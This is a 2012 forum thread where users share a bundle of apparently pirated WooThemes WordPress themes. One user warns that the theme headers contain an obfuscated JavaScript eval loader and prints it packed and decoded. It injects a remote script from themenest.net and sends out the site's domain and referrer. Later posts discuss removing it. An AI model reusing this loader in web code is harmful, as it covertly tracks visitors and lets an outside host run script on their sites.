[GET] All WooThemes (117 as of 08/16/2012)

***heroin*** · 08-30-2012, 07:38 AM

whohooo thanks!

***gnollik*** · 10-12-2012, 08:50 AM

BE AWARE - ALL header files are poisoned with this code:

Code:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|n​et|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000​|script'.split('|'),0,{}));

decode of this packed code:

Code:

document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');

***galvatron*** · 11-04-2012, 04:15 AM

Sorry for the silly question. However, gnollik is there anyway to fix it, like maybe remove the cade provided aboveor just dont use these themes.

thanks in advance.

***Ltheordinary*** · 11-11-2012, 09:13 PM

Great..

A bunch of thanks :)

***askfriends*** · 11-14-2012, 03:55 PM

(10-12-2012 08:50 AM)gnollik Wrote:
BE AWARE - ALL header files are poisoned with this code:

Code:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'">\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));
decode of this packed code:

Code:

document.write('');

Please respond to this post, are these themes infected with above mentioned code?

***iojik*** · 11-15-2012, 02:48 AM

great man. thank you!

***dougkpga*** · 11-21-2012, 04:16 AM

has anyone used these themes and had any dram a with the infection in the headers?

as asked before, is it possible to remove them?

cheers

***shiitake*** · 11-23-2012, 11:06 PM

I tried taking out the header code in one theme, since it doesn't seem to do anything other than call the script on themenest.net, and the template works fine. Looking at the generated source code there are no other calls to themenest.net.

***bestmoment*** · 11-24-2012, 01:24 AM

(11-23-2012 11:06 PM)shiitake Wrote: Thanks for clarifying.

(11-23-2012 11:06 PM)shiitake Wrote: I tried taking out the header code in one theme, since it doesn't seem to do anything other than call the script on themenest.net, and the template works fine. Looking at the generated source code there are no other calls to themenest.net.

***nythis*** · 11-24-2012, 05:06 PM

this is an awesome share thank you